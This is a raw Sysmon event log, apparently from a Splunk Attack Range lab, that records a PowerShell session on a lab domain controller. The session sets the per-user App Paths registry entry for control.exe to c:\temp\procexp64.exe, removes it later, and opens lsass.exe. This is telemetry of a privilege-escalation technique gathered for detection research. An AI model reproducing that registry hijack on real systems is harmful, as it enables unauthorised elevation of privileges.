13241300x80000000000000001051232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:57:40.641{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 23542300x80000000000000001051231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBA7883246AC61F6D7295D34998F7D07,SHA256=30AA5FE32C2CD21B9BDD15F39C69CE8ED122340156963215DFB535027A087624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.638{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02A6AA0B17411923BA705BC9356AAB43,SHA256=9095CCBE957F229AE972F7EE0803BC8C1DEFD2B2A3055548A5C86F6AB8142526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437C389DAB0ED295191BA185CDA12F5C,SHA256=8717EFEAD7831EEEB83BD1F6916C3A0F805ABC97858BB2379E5E272509958E33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.268{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.268{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001051226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:40.236{466BC892-F5F3-60EB-877D-00000000CF01}9944\PSHost.132705502596233024.9944.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.221{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_uj1yo4yo.ahl.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.221{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_evjoeowr.bq1.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.205{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_evjoeowr.bq1.ps12021-07-12 07:57:40.205 10341000x80000000000000001051222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5
1781 10341000x80000000000000001051218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e3f3e.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.121{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.052{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:40.052{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:41.993{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60283172CE39E3D61E9DE18878ECA06,SHA256=331E797C1697207CF78853E7D5FB465B540AA3959A4F4043EA7B791B6476CC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:41.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9DB098156DF7EA9B25D8F873B08390E,SHA256=DC0CFED7A60C0BF50D26E966714AD0662272E89A8C1296C22F0F841CFD1D224B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51101-false10.0.1.12-8000- 
23542300x80000000000000001051233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:41.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7516D07F9E51676DB4F3C62069F5A8B9,SHA256=A85D5D476891556241C51841B1F3CFBC0C00E8E523A99256A7FBF1F0A0005A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:42.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE321FA6559E557E02044F0801D9640,SHA256=6BF0E7133B50B83F9877A02BA5F091BBBC05B21D09130D2793546840C4F1FEE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.781{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001051238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 07:57:43.762{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 23542300x80000000000000001051237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:43.172{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E20CE5D822D68C22C050B569242045C0,SHA256=03227565C39D9A17B340EA6F682BDA51E6231EAE429246840B6A899C3E6A3EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:43.024{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6C7292A642A96B16D71F504A8BDCF31,SHA256=D76C602BEF58EE22F01645A2D7497F10E526B03B86BDBE8D1AF9D4D533A90294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.767{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=13565C4D8EB3E389C63BE667968CFAFD,SHA256=33C31CE8543D501ECD051405B360EFB608E7DC68BE2E78C35CC51167FF8D977E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:44.644{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.643{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32DC-60E8-900B-00000000CF01}8936C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.188{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3ADFDAD03EFD815165523203BAB0861,SHA256=0B71B177839017C32B8516F79123D0F0C52B6B7B1E2AF6D6D53E703AA1536A14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:42.406{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57335-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000808575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:44.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85253943C5A0B647F6CA9ADE2F55BED0,SHA256=B1E510D8B0EEAE217AC5640961523C13EA8D54987BDBB7B5178D467C53E08934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.989{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=D917046EA024B72C907E8A1820E3B965,SHA256=B445EE1AFAEB6AA306351C2E675567DF0F0EC7185B6B90C51E2ED17383500C7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.989{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
